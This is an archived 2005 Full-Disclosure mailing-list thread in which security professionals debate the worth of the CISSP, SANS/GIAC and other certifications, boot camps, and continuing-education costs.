Hi Friends, What you think about CCIE certification model, practice and write tests ? I think that is a good model to Security Certifications. But, can you create a practice tests not using especific vendors ? -Mensagem original- De: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] nome de Vladamir Enviada em: quarta-feira, 23 de marÃo de 2005 14:23 Para: DAN MORRILL Cc: full-disclosure@lists.grok.org.uk Assunto: Re: [Full-disclosure] CISSP Test Very good points, so.. who wants to start writing to the mentioned organizations about this? DAN MORRILL wrote: > I think in reading the multiple threads on this issue, there there are a > number of perspectives on the value of the CISSP. > > What was most interesting was the CEO's perspective. Since the CISSP is > a boot camp, and the SANS is bootcampable in the longer run with the > removal of the practicle. The real question is working towards a > certificate that demonstrates ability to work in the security arena, one > that is really hard to get, and one that really tests the ability to do > the work. > > While CISSP and SANS are great to have as a resume filter, it does not > imply that anyone with either certificate to their name can actually do > the work. What I am seeing is that many people are going for these, and > have them, but had them a result from an IDS system, or ask them to do a > security design for either a network or a chunk of code, the ability to > actually perform the task is not there, even though they have the > certificate. > > Personally, I believe the community needs something, certificate, > degree, internship, what ever, that actually means you can perform > competently in the security arena. That there is a skill set there that > the entire community agree's upon is the minimum recommended skill set > to work in this field. If we had something like that, then any school > that is pumping out Bachelors of Information Security folks would have a > standard. Anyone building a bootcamp or certificate program would have > an agreed upon community standard to work with. > > ISC2, ISSA, WSA, SANS, et al. Could build a board in conjunction with > the community, develop the minimum qualifications to work in the field, > and actually accomplish something once they have been certified or > degreed. NSA has been hugely successful in developing security schools > through James Madison, Boise, et al. But they have to agree to and teach > to the minimum standard that NSA has put together to meet the needs that > NSA has identified. > > I think until we as a community agree upon a minimum standard, apply it > consistantly across the board much like doctors, lawyers, social > workers, and other degreed or licensed professionals, we will continue > to have this debate until the house burns down. As security > professionals, as security folks, we have the same ability to either do > good, or do harm as any other profession does. We need to understand > this, and begin working towards skill sets either certificate or degree > that actually mean something useful at the end of the day. > > My thoughts, flames invited. > r/ > Dan > > > > Sometimes MSN E-mail will indicate that the mesasge failed to be > delivered. Please resend when you get those, it does not mean that the > mail box is bad, merely that MSN mail is over worked at the time. > > > > > >> From: "Clement Dupuis" <[EMAIL PROTECTED]> >> To: <[EMAIL PROTECTED]>,"'Vladamir'" >> <[EMAIL PROTECTED]> >> CC: full-disclosure@lists.grok.org.uk >> Subject: RE: [Full-disclosure] CISSP Test >> Date: Wed, 23 Mar 2005 06:45:47 -0500 >> >> Robert E. Lee wrote: >> >> "SANS programs have little to do with security. I'm glad they changed >> their >> policy. They seem more honest now." >> >> Good day Robert, >> >> Honesty is a very neat goal to achieve, however it has many facets. >> >> I lately learned (under all reserve, please correct me if you know >> otherwise) that SANS no longer has any NON PROFIT portion left. They >> used >> to be registered as a non-profit entity in the state of Maryland but it >> seems that it was dissolved. Technically we could say there is no SANS >> Institute left anymore as we knew it on the non profit side. After they >> dissolve SANS they created a FOR PROFIT corporation called ESCAL which >> registered the names used in the non-profit as trademarks for their >> new for >> profit organization. Even thou you see the name GIAC and SANS being used >> everywhere, they are all trademark (not organizations
Re: [Full-disclosure] CISSP Test
Very good points, so.. who wants to start writing to the mentioned organizations about this? DAN MORRILL wrote: I think in reading the multiple threads on this issue, there there are a number of perspectives on the value of the CISSP. What was most interesting was the CEO's perspective. Since the CISSP is a boot camp, and the SANS is bootcampable in the longer run with the removal of the practicle. The real question is working towards a certificate that demonstrates ability to work in the security arena, one that is really hard to get, and one that really tests the ability to do the work. While CISSP and SANS are great to have as a resume filter, it does not imply that anyone with either certificate to their name can actually do the work. What I am seeing is that many people are going for these, and have them, but had them a result from an IDS system, or ask them to do a security design for either a network or a chunk of code, the ability to actually perform the task is not there, even though they have the certificate. Personally, I believe the community needs something, certificate, degree, internship, what ever, that actually means you can perform competently in the security arena. That there is a skill set there that the entire community agree's upon is the minimum recommended skill set to work in this field. If we had something like that, then any school that is pumping out Bachelors of Information Security folks would have a standard. Anyone building a bootcamp or certificate program would have an agreed upon community standard to work with. ISC2, ISSA, WSA, SANS, et al. Could build a board in conjunction with the community, develop the minimum qualifications to work in the field, and actually accomplish something once they have been certified or degreed. NSA has been hugely successful in developing security schools through James Madison, Boise, et al. But they have to agree to and teach to the minimum standard that NSA has put together to meet the needs that NSA has identified. I think until we as a community agree upon a minimum standard, apply it consistantly across the board much like doctors, lawyers, social workers, and other degreed or licensed professionals, we will continue to have this debate until the house burns down. As security professionals, as security folks, we have the same ability to either do good, or do harm as any other profession does. We need to understand this, and begin working towards skill sets either certificate or degree that actually mean something useful at the end of the day. My thoughts, flames invited. r/ Dan Sometimes MSN E-mail will indicate that the mesasge failed to be delivered. Please resend when you get those, it does not mean that the mail box is bad, merely that MSN mail is over worked at the time. From: "Clement Dupuis" <[EMAIL PROTECTED]> To: <[EMAIL PROTECTED]>,"'Vladamir'" <[EMAIL PROTECTED]> CC: full-disclosure@lists.grok.org.uk Subject: RE: [Full-disclosure] CISSP Test Date: Wed, 23 Mar 2005 06:45:47 -0500 Robert E. Lee wrote: "SANS programs have little to do with security. I'm glad they changed their policy. They seem more honest now." Good day Robert, Honesty is a very neat goal to achieve, however it has many facets. I lately learned (under all reserve, please correct me if you know otherwise) that SANS no longer has any NON PROFIT portion left. They used to be registered as a non-profit entity in the state of Maryland but it seems that it was dissolved. Technically we could say there is no SANS Institute left anymore as we knew it on the non profit side. After they dissolve SANS they created a FOR PROFIT corporation called ESCAL which registered the names used in the non-profit as trademarks for their new for profit organization. Even thou you see the name GIAC and SANS being used everywhere, they are all trademark (not organizations) of the new privately owned company. Principals at SANS have NEVER claimed to be non-profit, it is a myth that we the people that have been dealing with SANS for a long time (since the time they were non profit) have been propagating. We have been keeping this myth alive simply because we did not know any better and we did not know that the non-profit was dissolved. It was done without any noise or public announcement to the people that were already certified. So they NEVER lied but they never went to any length to inform people of the real and current status of their corporation activity. Most people think that GIAC is non profit which is not the case anymore and this better explains the decision of dropping the practical requirement: it does not generate money and it is not a good business decision to keep something alive that will become a drain on the bottom line. Which is a bit contrary to the reason given of improving the overall state of the security community :-)
RE: [Full-disclosure] CISSP Test
I think in reading the multiple threads on this issue, there there are a number of perspectives on the value of the CISSP. What was most interesting was the CEO's perspective. Since the CISSP is a boot camp, and the SANS is bootcampable in the longer run with the removal of the practicle. The real question is working towards a certificate that demonstrates ability to work in the security arena, one that is really hard to get, and one that really tests the ability to do the work. While CISSP and SANS are great to have as a resume filter, it does not imply that anyone with either certificate to their name can actually do the work. What I am seeing is that many people are going for these, and have them, but had them a result from an IDS system, or ask them to do a security design for either a network or a chunk of code, the ability to actually perform the task is not there, even though they have the certificate. Personally, I believe the community needs something, certificate, degree, internship, what ever, that actually means you can perform competently in the security arena. That there is a skill set there that the entire community agree's upon is the minimum recommended skill set to work in this field. If we had something like that, then any school that is pumping out Bachelors of Information Security folks would have a standard. Anyone building a bootcamp or certificate program would have an agreed upon community standard to work with. ISC2, ISSA, WSA, SANS, et al. Could build a board in conjunction with the community, develop the minimum qualifications to work in the field, and actually accomplish something once they have been certified or degreed. NSA has been hugely successful in developing security schools through James Madison, Boise, et al. But they have to agree to and teach to the minimum standard that NSA has put together to meet the needs that NSA has identified. I think until we as a community agree upon a minimum standard, apply it consistantly across the board much like doctors, lawyers, social workers, and other degreed or licensed professionals, we will continue to have this debate until the house burns down. As security professionals, as security folks, we have the same ability to either do good, or do harm as any other profession does. We need to understand this, and begin working towards skill sets either certificate or degree that actually mean something useful at the end of the day. My thoughts, flames invited. r/ Dan Sometimes MSN E-mail will indicate that the mesasge failed to be delivered. Please resend when you get those, it does not mean that the mail box is bad, merely that MSN mail is over worked at the time. From: "Clement Dupuis" <[EMAIL PROTECTED]> To: <[EMAIL PROTECTED]>,"'Vladamir'" <[EMAIL PROTECTED]> CC: full-disclosure@lists.grok.org.uk Subject: RE: [Full-disclosure] CISSP Test Date: Wed, 23 Mar 2005 06:45:47 -0500 Robert E. Lee wrote: "SANS programs have little to do with security. I'm glad they changed their policy. They seem more honest now." Good day Robert, Honesty is a very neat goal to achieve, however it has many facets. I lately learned (under all reserve, please correct me if you know otherwise) that SANS no longer has any NON PROFIT portion left. They used to be registered as a non-profit entity in the state of Maryland but it seems that it was dissolved. Technically we could say there is no SANS Institute left anymore as we knew it on the non profit side. After they dissolve SANS they created a FOR PROFIT corporation called ESCAL which registered the names used in the non-profit as trademarks for their new for profit organization. Even thou you see the name GIAC and SANS being used everywhere, they are all trademark (not organizations) of the new privately owned company. Principals at SANS have NEVER claimed to be non-profit, it is a myth that we the people that have been dealing with SANS for a long time (since the time they were non profit) have been propagating. We have been keeping this myth alive simply because we did not know any better and we did not know that the non-profit was dissolved. It was done without any noise or public announcement to the people that were already certified. So they NEVER lied but they never went to any length to inform people of the real and current status of their corporation activity. Most people think that GIAC is non profit which is not the case anymore and this better explains the decision of dropping the practical requirement: it does not generate money and it is not a good business decision to keep something alive that will become a drain on the bottom line. Which is a bit contrary to the reason given of improving the overall state of the security community :-) Take care Clement ___ Full-Disclosure - We believe in it. Charter: http://lists
RE: [Full-disclosure] CISSP Test
Robert E. Lee wrote: "SANS programs have little to do with security. I'm glad they changed their policy. They seem more honest now." Good day Robert, Honesty is a very neat goal to achieve, however it has many facets. I lately learned (under all reserve, please correct me if you know otherwise) that SANS no longer has any NON PROFIT portion left. They used to be registered as a non-profit entity in the state of Maryland but it seems that it was dissolved. Technically we could say there is no SANS Institute left anymore as we knew it on the non profit side. After they dissolve SANS they created a FOR PROFIT corporation called ESCAL which registered the names used in the non-profit as trademarks for their new for profit organization. Even thou you see the name GIAC and SANS being used everywhere, they are all trademark (not organizations) of the new privately owned company. Principals at SANS have NEVER claimed to be non-profit, it is a myth that we the people that have been dealing with SANS for a long time (since the time they were non profit) have been propagating. We have been keeping this myth alive simply because we did not know any better and we did not know that the non-profit was dissolved. It was done without any noise or public announcement to the people that were already certified. So they NEVER lied but they never went to any length to inform people of the real and current status of their corporation activity. Most people think that GIAC is non profit which is not the case anymore and this better explains the decision of dropping the practical requirement: it does not generate money and it is not a good business decision to keep something alive that will become a drain on the bottom line. Which is a bit contrary to the reason given of improving the overall state of the security community :-) Take care Clement ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] CISSP Test
Boo yah! Screw college :) vulcanius wrote: Back in the summer of 2003 I went out to Silicon Valley and met Jeff Snyder, Sen. Vice Pres of Veridian's security sector (now General Dynamics by the way) and I was surprised to find out that a little over half of the employees in their sec. division didn't have any form of college degree, they only had CISSPs. On Tue, 22 Mar 2005 21:05:44 -0800, [EMAIL PROTECTED] <[EMAIL PROTECTED]> wrote: Vladamir([EMAIL PROTECTED])@Tue, Mar 22, 2005 at 11:34:35PM -0500: In my opinion, they should do away with "boot camps", they churn out paper CCNAs, paper CISSPs, and they're doing nobody any real good. Why did SANS do away with the practical portion of their (I forgot the name) exam? I read briefly about it, and it looks (well, looked) like a lot of fun, how hard would it be? Set up honey pot w/ snort, ethereal, secured logging server Advertise "insecure machine" Sit back, collect packets, write report. Doesn't sound too hard to me! Doesn't sound too useful either! But seriously, most of the "security" industry is sadly broken. It's filled with good intentioned people who grossly misunderstand the problem and people just looking to make a buck where ever they can. SANS programs have little to do with security. I'm glad they changed their policy. They seem more honest now. If you want to learn about security, start here: http://www.acm.org/classics/sep95/ http://www.nsa.gov/selinux/papers/inevitability/ http://www.radium.ncsc.mil/tpep/library/rainbow/ Robert -- Robert E. Lee CEO, Dyad Security, Inc. W - http://www.dyadsecurity.com E - [EMAIL PROTECTED] M - (949) 394-2033 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] CISSP Test
** Hrm... seems my first attempt got rejected for "No reason given." I know that much, I just think it's a bit dumb that the only form of certification/education they had was a CISSP. Not to mention they comprised over half of the sector's employees. On Wed, 23 Mar 2005 00:54:00 -0500, vulcanius <[EMAIL PROTECTED]> wrote: > I know that much, I just think it's a bit dumb that the only form of > certification/education they had was a CISSP. Not to mention they > comprised over half of the sector's employees. > > > On Tue, 22 Mar 2005 21:52:23 -0800, [EMAIL PROTECTED] > <[EMAIL PROTECTED]> wrote: > > vulcanius([EMAIL PROTECTED])@Wed, Mar 23, 2005 at 12:40:51AM -0500: > > > Back in the summer of 2003 I went out to Silicon Valley and met Jeff > > > Snyder, Sen. Vice Pres of Veridian's security sector (now General > > > Dynamics by the way) and I was surprised to find out that a little > > > over half of the employees in their sec. division didn't have any form > > > of college degree, they only had CISSPs. > > > > IIRC you have to have a certain number of CISSP certified people to bid on > > some government contracts. > > > > Robert > > > > -- > > Robert E. Lee > > CEO, Dyad Security, Inc. > > W - http://www.dyadsecurity.com > > E - [EMAIL PROTECTED] > > M - (949) 394-2033 > > > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] CISSP Test
I know that much, I just think it's a bit dumb that the only form of certification/education they had was a CISSP. Not to mention they comprised over half of the sector's employees. On Tue, 22 Mar 2005 21:52:23 -0800, [EMAIL PROTECTED] <[EMAIL PROTECTED]> wrote: > vulcanius([EMAIL PROTECTED])@Wed, Mar 23, 2005 at 12:40:51AM -0500: > > Back in the summer of 2003 I went out to Silicon Valley and met Jeff > > Snyder, Sen. Vice Pres of Veridian's security sector (now General > > Dynamics by the way) and I was surprised to find out that a little > > over half of the employees in their sec. division didn't have any form > > of college degree, they only had CISSPs. > > IIRC you have to have a certain number of CISSP certified people to bid on > some government contracts. > > Robert > > -- > Robert E. Lee > CEO, Dyad Security, Inc. > W - http://www.dyadsecurity.com > E - [EMAIL PROTECTED] > M - (949) 394-2033 > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] CISSP Test
Back in the summer of 2003 I went out to Silicon Valley and met Jeff Snyder, Sen. Vice Pres of Veridian's security sector (now General Dynamics by the way) and I was surprised to find out that a little over half of the employees in their sec. division didn't have any form of college degree, they only had CISSPs. On Tue, 22 Mar 2005 21:05:44 -0800, [EMAIL PROTECTED] <[EMAIL PROTECTED]> wrote: > Vladamir([EMAIL PROTECTED])@Tue, Mar 22, 2005 at 11:34:35PM -0500: > > In my opinion, they should do away with "boot camps", they churn out > > paper CCNAs, paper CISSPs, and they're doing nobody any real good. > > > > Why did SANS do away with the practical portion of their (I forgot the > > name) exam? I read briefly about it, and it looks (well, looked) like a > > lot of fun, how hard would it be? > > > > Set up honey pot w/ snort, ethereal, secured logging server > > Advertise "insecure machine" > > Sit back, collect packets, write report. > > > > Doesn't sound too hard to me! > > Doesn't sound too useful either! > > But seriously, most of the "security" industry is sadly broken. It's filled > with good intentioned people who grossly misunderstand the problem and people > just looking to make a buck where ever they can. > > SANS programs have little to do with security. I'm glad they changed their > policy. They seem more honest now. > > If you want to learn about security, start here: > http://www.acm.org/classics/sep95/ > http://www.nsa.gov/selinux/papers/inevitability/ > http://www.radium.ncsc.mil/tpep/library/rainbow/ > > Robert > > -- > Robert E. Lee > CEO, Dyad Security, Inc. > W - http://www.dyadsecurity.com > E - [EMAIL PROTECTED] > M - (949) 394-2033 > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] CISSP Test
Vladamir([EMAIL PROTECTED])@Tue, Mar 22, 2005 at 11:34:35PM -0500: > In my opinion, they should do away with "boot camps", they churn out > paper CCNAs, paper CISSPs, and they're doing nobody any real good. > > Why did SANS do away with the practical portion of their (I forgot the > name) exam? I read briefly about it, and it looks (well, looked) like a > lot of fun, how hard would it be? > > Set up honey pot w/ snort, ethereal, secured logging server > Advertise "insecure machine" > Sit back, collect packets, write report. > > Doesn't sound too hard to me! Doesn't sound too useful either! But seriously, most of the "security" industry is sadly broken. It's filled with good intentioned people who grossly misunderstand the problem and people just looking to make a buck where ever they can. SANS programs have little to do with security. I'm glad they changed their policy. They seem more honest now. If you want to learn about security, start here: http://www.acm.org/classics/sep95/ http://www.nsa.gov/selinux/papers/inevitability/ http://www.radium.ncsc.mil/tpep/library/rainbow/ Robert -- Robert E. Lee CEO, Dyad Security, Inc. W - http://www.dyadsecurity.com E - [EMAIL PROTECTED] M - (949) 394-2033 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] CISSP Test
In my opinion, they should do away with "boot camps", they churn out paper CCNAs, paper CISSPs, and they're doing nobody any real good. Why did SANS do away with the practical portion of their (I forgot the name) exam? I read briefly about it, and it looks (well, looked) like a lot of fun, how hard would it be? Set up honey pot w/ snort, ethereal, secured logging server Advertise "insecure machine" Sit back, collect packets, write report. Doesn't sound too hard to me! J.A. Terranson wrote: On Tue, 22 Mar 2005, Wade Woolwine wrote: Just a word on the CISSP, you have to have worked in the field for 5 years (3 years with degree) in order to get it...otherwise you'll get the ISC2 associates cert...same exam and after the x years period, you will automatically be grandfathered in to CISSP. Yeah, riiggghhh. If they would actually enforce this requirement, then the CISSP *might* mean something. But they are fully aware of the outright fraudulent CISSPs they are churning out (after all, they get the money either way, why should they be self-policing?) - let's see, how many 18 year olds have 5 years experience??? Now, how many have CISSPs after going to a 1 week "Boot Camp". All of these certifications are now completely worthless, as they all suffer from this defect. And the certifying bodies have brought ruin, rather than respect, to our profession. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] CISSP Test
On Tue, 22 Mar 2005, Wade Woolwine wrote: > Just a word on the CISSP, you have to have worked in the field for 5 years > (3 years with degree) in order to get it...otherwise you'll get the ISC2 > associates cert...same exam and after the x years period, you will > automatically be grandfathered in to CISSP. Yeah, riiggghhh. If they would actually enforce this requirement, then the CISSP *might* mean something. But they are fully aware of the outright fraudulent CISSPs they are churning out (after all, they get the money either way, why should they be self-policing?) - let's see, how many 18 year olds have 5 years experience??? Now, how many have CISSPs after going to a 1 week "Boot Camp". All of these certifications are now completely worthless, as they all suffer from this defect. And the certifying bodies have brought ruin, rather than respect, to our profession. -- Yours, J.A. Terranson [EMAIL PROTECTED] 0xBD4A95BF "Quadriplegics think before they write stupid pointless shit...because they have to type everything with their noses." http://www.tshirthell.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] CISSP Test
Good day George, I will concede with you that ISC2 has had and still has today some inability to communicate effectively with their membership and the community as a whole. Their advertising is aggressive and really makes it look as if you have to buy your CPE's. There are multitude of other ways to get CPE's: You can write new exam questions You can read a book You can subscribe to some of the recognize magazine You can teach others You can attend seminars or any other form of security training You can write articles You can work on the board of a security organization You can proctor exams You can most definitively get CPE for your research if it is published And the list goes on... Take care Clement Clement Dupuis, CD CCCure Enterprise Security & Training Inc. CISSP, GCFW, GCIA, Security+, CEH, CCSA, CCSE, ACE President/Chief Learning Officer (CLO) Tel: 954 364 8410 (Florida) Tel: 819 340 0138 (Quebec) Fax: 636 773 6328 Maintainer of : The CISSP and SSCP Open Study Guides Web Site http://www.cccure.org The Professional Security Testers Warehouse http://www.professionalsecuritytesters.org -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of george jetson Sent: Tuesday, March 22, 2005 4:49 PM To: full-disclosure@lists.grok.org.uk Subject: RE: [Full-disclosure] CISSP Test The CISSP is a valuable certification - to a point, but my gripe is with the staying certified process. ISC2 constantly sends out invitations to get CPEs (basically continuing education credits) for certificate holders to get from 10 to 30 credits towards the required amount of 120 CPEs in 3 yrs, that cost an exorbitant amount. Prices often range from 700+ to nearly 3 grand. At a median price of 1500 bucks for 30 CPEs it would end up costing 6000 dollars over 3 yrs just to stay certified. That in my opinion is just plain stupid. The CISSP certification started out as a way to establish a certificate holders knowledge - - it has turned into just another money making scheme. I really don't mind having to have CPEs to stay certified but being employed in this field counts as nothing - regardless of the research attached to the position. You have to go "above the norm" or pay for the CPEs. Heck we all know what goes on at seminars. Bleh worthless for the most point. Lot's of fun but that's about it. Well that's my 2 cents. flame away __ Do you Yahoo!? Yahoo! Mail - Helps protect you from nasty viruses. http://promotions.yahoo.com/new_mail ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] CISSP Test
The CISSP is a valuable certification - to a point, but my gripe is with the staying certified process. ISC2 constantly sends out invitations to get CPEs (basically continuing education credits) for certificate holders to get from 10 to 30 credits towards the required amount of 120 CPEs in 3 yrs, that cost an exorbitant amount. Prices often range from 700+ to nearly 3 grand. At a median price of 1500 bucks for 30 CPEs it would end up costing 6000 dollars over 3 yrs just to stay certified. That in my opinion is just plain stupid. The CISSP certification started out as a way to establish a certificate holders knowledge - - it has turned into just another money making scheme. I really don't mind having to have CPEs to stay certified but being employed in this field counts as nothing - regardless of the research attached to the position. You have to go "above the norm" or pay for the CPEs. Heck we all know what goes on at seminars. Bleh worthless for the most point. Lot's of fun but that's about it. Well that's my 2 cents. flame away __ Do you Yahoo!? Yahoo! Mail - Helps protect you from nasty viruses. http://promotions.yahoo.com/new_mail ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] CISSP Test
Rob, if I need to make myself more clear I will. Directly from the ISC2 website: The CISSP credential is ideal for mid- and senior-level managers who are working toward or have already attained positions as CISOs, CSOs or Senior Security Engineers. There are three concentrations within the CISSP ISSAP - Concentration in Architecture ISSEP - Concentration in Engineering ISSMP - Concentration in Management The SSCP - The SSCP credential is ideal for those working toward or who have already attained positions as Senior Network Security Engineers, Senior Security Systems Analysts or Senior Security Administrators. (Concentrations coming soon!) The CBK is a comprehensive working knowledge of security as pertains to physical, data, and operational needs of a business. I have had my CISSP for about 3 years now and must say it has opened doors for me that otherwise would not have if it weren't for the certification and the training that comes along with it. I am growing and learning new things daily and it is because of the opportunities that the CISSP credential has provided!! Very Respectfully, David Chastain ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] CISSP Test
The CISSP cert is a great cert to have if you want to get your foot in the door. Some places require you to have the cert as well. It gives the assurance that the holder of the cert is a fairly well rounded security person that understands the concepts, but not neccessarily the finer details of implimentation. CISSP is basically a 50,000 foot view of IT security as a whole. The SANS / GIAC exams are better IMHO. Simply due to the fact that they mostly specialize in one field, and require you to complete a practical assignment that enforces the fact that you really know how to make use of the material in a real world situation. BUT, SANS / GIAC has done away with the practical written paper part of the exam as recent as last week. This severely devalues the GIAC certs IMHO. Now any Joe Shmoe that can read a book and memorize said book, will be able to get certified. The practical exam weeded out the "exam-cram" crowd. I understand that some people just couldn't find the time, you have 5 months to write the practicle if you really want the cert you'll find the time. My only gripe about CISSP is with ISC2, MOST of my spam comes from ISC2. Ok, perhaps not most of it, but a bunch of it. They constantly send crap to me, elections for board of directors (who cares?), this class is coming up (I'm already CISSP, why take another class?), that class is coming up, this thing is happening, that thing is happening Really who cares? I could care less who the "president" is of ISC2, place Barbie in charge for all I care, I could care less if they have yet another class coming up in my area, I'm already certified, why in the world would I want to take a class to becoem CISSP) ISC2 says they are non-profit, great, fine, yippe, but what do I get for my $85 per year? I have the cert, that's all I needed, I paid $450 for the priviledge to take the exam. Please don't tell me it costs $85 per year to keep track of my CPE's If it does I'll keep track of them myself on a piece of 3 cent paper thank you very much. SANS doesn't charge me a yearly fee for my GCIH, but I do have to be re-tested every 2 years at a cost of $120... not unreasonable if you ask me Exibar - Original Message - From: "adeel hussain" <[EMAIL PROTECTED]> To: Sent: Tuesday, March 22, 2005 11:37 AM Subject: RE: [Full-disclosure] CISSP Test > Hello Vladamir, > > To answer your question, yes the CISSP is worth it. However it is > only worth it due to the publics misconception of what is is. > > The CISSP certification basically shows that you have a base > understanding of the primary concepts across what are widely regarded > as all the major areas if IT security knowledge (known as the Common > Body of Knowledge or CBK). This is a good thing if you are, or aspire > to be, in a management position. > > Unfortunately the common perception of the CISSP by most non-IT > security people (which includes HR staff) is that someone who is a > CISSP is capable and competent in all areas of IT security. Add to > that the belief it is the best (or only) security certification they > are aware of and it becomes "the" security certification in thier > eyes. > > I have seen many job descriptions in my time and in the last few years > it is rare to find one that does not either require or desire the > CISSP. > > As for other certifications, the SANS certs are quite good although, I > believe, they are about to get devalued by the removal of the > practical requirement. I would recommend getting the CISSP, maybe the > GSEC (SANS security essentials cert) and then focusing on certs for > products/systems within the area you will be working in. But > remember, the cert is just the starting point and the resume's foot in > the door. You need to study and get as much hands on as you can to > actually learn your chosen trade. > > > Good Luck, > > Adeel > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] CISSP Test
agreed on the devaluing of the GIACs. SANS is really making a big mistake and angering 7000 Security Professionals. The three "crown jewels" as I see them are CISSP, SANS GIAC(with practical) and CISM/CISA. Get any of those combined with solid experience and you're in. A CISSP is basically becoming like the MCSE these days. Scott Renna CISSP, GCIA, GCIH <---Practical Security Team Lead On Tue, 22 Mar 2005 11:37:45 -0500 adeel hussain <[EMAIL PROTECTED]> wrote: Hello Vladamir, To answer your question, yes the CISSP is worth it. However it is only worth it due to the publics misconception of what is is. The CISSP certification basically shows that you have a base understanding of the primary concepts across what are widely regarded as all the major areas if IT security knowledge (known as the Common Body of Knowledge or CBK). This is a good thing if you are, or aspire to be, in a management position. Unfortunately the common perception of the CISSP by most non-IT security people (which includes HR staff) is that someone who is a CISSP is capable and competent in all areas of IT security. Add to that the belief it is the best (or only) security certification they are aware of and it becomes "the" security certification in thier eyes. I have seen many job descriptions in my time and in the last few years it is rare to find one that does not either require or desire the CISSP. As for other certifications, the SANS certs are quite good although, I believe, they are about to get devalued by the removal of the practical requirement. I would recommend getting the CISSP, maybe the GSEC (SANS security essentials cert) and then focusing on certs for products/systems within the area you will be working in. But remember, the cert is just the starting point and the resume's foot in the door. You need to study and get as much hands on as you can to actually learn your chosen trade. Good Luck, Adeel ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] CISSP Test
No CISSP is not more for management and I'm sure ISC2 would take exception for that especially when they have a concentration for management. Robert -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of David Chastain Sent: Tuesday, March 22, 2005 12:04 PM To: Vladamir Cc: full-disclosure@lists.grok.org.uk; bugtraq@securityfocus.com Subject: Re: [Full-disclosure] CISSP Test To reiterate, CISSP is more for management...If you want a more thorough understanding of secure networks, platforms -- Go for the SSCP! David Chastain, CISSP On Tuesday, March 22, 2005, at 08:06AM, Vladamir <[EMAIL PROTECTED]> wrote: >Wow, thanks a lot. I'll pick the book back up, I have read about a lot >of "clueless" CISSPs, this one gentlemen I spoke with (Who is a CISSP) >said that OpenBSD is easily remotely exploitable, it made me question >the integrity of this gentleman and the process in which one becomes a >CISSP (Assuming it has to do with through understanding of secure >networks, platforms, etc) > >What are some of the other Computer/Network security exams that are good >for showing a through understanding of the concepts? > >Wade Woolwine wrote: >> Agreed with Robert on this one. It's pretty much a sure-fire way to get >> your foot in the door...esp. if you're dealing with Gov. contractors or >> the Gov. itself. Once you have the job, if you don't have the skills, you >> won't last long. I figure 90% of the job battle is actually getting >> through the HR folks who look over resumes checking off boxes in a >> checklist to see if you qualify - certs/education and of course experience >> will fill all those check lists. >> >> wade >> >> ___ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> >___ >Full-Disclosure - We believe in it. >Charter: http://lists.grok.org.uk/full-disclosure-charter.html >Hosted and sponsored by Secunia - http://secunia.com/ > > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] CISSP Test
